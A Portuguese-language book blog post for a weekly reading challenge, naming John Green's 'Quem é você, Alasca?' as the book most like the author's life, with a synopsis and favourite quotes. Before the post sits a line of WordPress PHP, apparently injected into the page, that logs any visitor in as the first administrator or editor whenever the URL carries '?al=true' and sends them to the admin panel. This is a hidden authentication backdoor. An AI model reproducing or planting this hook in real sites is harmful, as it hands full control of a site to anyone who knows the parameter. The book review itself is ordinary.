// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Semana 12- Livro que mais se parece com minha vida • A Menina da Janela

livros

3 de maio de 2014
Não dá pra mudar… Essa foto já tem a cara do desafio!

  Oi pessoal!
Estou de volta com o Desafio dos Livros. Essa semana foi bem complicadinha pois leio mais livros de fantasia, e minha vida (infelizmente) não se encaixa muito bem nesse gênero, haha…
Mas enfim, vamos ver como respondi o desafio?

Livro que mais se parece com minha vida

Quem é você, Alasca? – John Green
“O primeiro amigo, a primeira garota, as últimas palavras.”
“Miles Halter é um adolescente fissurado por célebres últimas palavras que, cansado de sua vidinha pacata e sem graça em casa, vai estudar num colégio interno à procura daquilo que o poeta François Rabelais, quando estava à beira da morte, chamou de o “Grande Talvez”. Muita coisa o aguarda em Culver Creek, inclusive Alasca Young, uma garota inteligente, espirituosa, problemática e extremamente sensual, que o levará para o seu labirinto e o catapultará em direção ao “Grande Talvez”.


Ok, agora explico a escolha: Na história (e principalmente no começo), Miles vive coisas muito parecidas com as que estou vivendo atualmente. Uma escola nova, novos amigos ou simplesmente amigos (que antes quase não existiam), a descoberta da independência, novos amores, novas sensações, emoções e experiencias, e identifico até mesmo uma sensação de pertencer àquele lugar. 
Enfim, acho que não pela história toda, mas principalmente pelas sensações de Miles provocadas pela nova escola, este livro representa bem minha vida atualmente. 
 E, como sempre, alguns dos meus trechos favoritos: 
 “Se as pessoas fossem chuva, eu seria garoa e ela, um furacão…”(pág. 91)
“Estava com medo, é claro. E talvez estivesse com medo de que o medo a paralisasse novamente…”(pág. 124)

“Cruzes! Não posso ser uma dessas pessoas que ficam sentadas falando que pretendem fazer isso e aquilo. Eu vou fazer e ponto. Imaginar o futuro é uma espécie de nostalgia.” (pág. 55)

É isso pessoal! 
Aah, e me desculpem pela péssima qualidade das fotos de hoje… só lembrei que a máquina estava descarregada na hora de fotografar, e pra não adiar mais o post o jeito foi recorrer às fotos do celular…
Já leram esse livro? O que acharam?
E qual livro mais se parece com a vida de vocês? Me contem!
Beijos, 
até a próxima!

Você também vai gostar

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Este site utiliza o Akismet para reduzir spam. Saiba como seus dados em comentários são processados.

23 Comments